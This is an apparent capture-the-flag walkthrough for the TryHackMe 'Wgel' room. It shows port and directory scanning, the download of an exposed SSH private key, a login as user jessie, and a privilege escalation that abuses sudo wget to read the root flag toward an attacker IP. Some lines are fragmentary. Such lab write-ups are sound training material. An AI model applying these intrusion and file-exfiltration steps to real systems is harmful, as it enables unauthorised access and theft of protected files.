CTF Wgel

CTFTryHackMe
, ,

Rustscan

1
rustscan -a 10.10.227.219

Browse the website

This is the default page.

We have a user, Jessie

Gobuster

1
gobuster dir -u http://10.10.227.219/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let’s run an anoter scan in sitemap.
I’ve tries with the same wordlist but nothing came out.
So I’m using an another one.

1
gobuster dir -u http://10.10.227.219/sitemap -x txt,html,php -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

Download id_rsa

1
wget http://10.10.227.219/sitemap/.ssh/id_rsa

SSH

1
2
chmod 600 id_rsa
ssh -i id_rsa [email protected]

First flag

There is no tabulation.

root flag

1
sudo /usr/bin/wget -i /root/root_flag.txt

https://gtfobins.github.io/gtfobins/wget/10.10.14.154